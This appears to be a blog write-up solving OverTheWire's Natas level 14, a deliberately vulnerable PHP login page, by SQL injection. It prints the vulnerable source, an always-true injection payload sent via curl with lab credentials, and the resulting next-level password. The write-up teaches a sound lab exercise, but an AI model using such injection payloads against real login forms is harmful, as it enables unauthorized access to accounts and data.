Recommended reading:
From the credentials discovered from the
previous challenge, head up to
http://natas14.natas.labs.overthewire.org and take a look at its content.
This is a new kind of challenge, although it involves code injection, this time we're working with SQL injections. These injections range from the most simple queries (like this challenge) to very complex ones.
If you take a look the website, it's a simple log in form. Let's look at the source code behind it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas14", "pass": "<censored>" };</script></head>
<body>
<h1>natas14</h1>
<div id="content">
<?
if(array_key_exists("username", $_REQUEST)) {
$link = mysql_connect('localhost', 'natas14', '<censored>');
mysql_select_db('natas14', $link);
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
if(mysql_num_rows(mysql_query($query, $link)) > 0) {
echo "Successful login! The password for natas15 is <censored><br>";
} else {
echo "Access denied!<br>";
}
mysql_close($link);
} else {
?>
<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
|
Not much to look at, simple logic. Checks for a
username key in the request (either GET or POST, which is not good, but unrelated to this challenge), connects to the database, sends a query to check for the
username and
password and responds accordingly. A minor side note, if we provide a
debug parameter in a GET request, it also prints the query that's executed.. With this in mind, we can assume this is a SQL injection challenge. Now we just need to know how to exploit it. If you look at line 19, where the query is built, the query uses the values directly from the request, without parsing them or escaping them, this is where we can take advantage. All we need to do is close the first quotes, write some SQL that always evaluates to TRUE (or in this case, that always returns something, since the code uses
mysql_num_rows) and close the second quotes. Here's how it looks:
Pretty simple, now we just send this to the server, either using the form itself, we can put it on the username and password fields, or go fancy and use
curl:
curl http://natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1@natas14.natas.labs.overthewire.org/ --data "username=\" OR \"1\"=\"1\" \"&password=\" OR \"1\"=\"1\" \""
There're a lot of \", we need to escape them, no big deal. This is what we get:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas14", "pass": "Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1" };</script></head>
<body>
<h1>natas14</h1>
<div id="content">
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
|
And voilĂ , line 14 gives' the password for natas 15.
| User |
natas15 |
| Password |
AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J |
This was a very simple SQL injection challenge, you can check the recommended reading that explains how it works and why, and also how to prevent this type of exploitation.
Never Settle,
No comments:
Post a Comment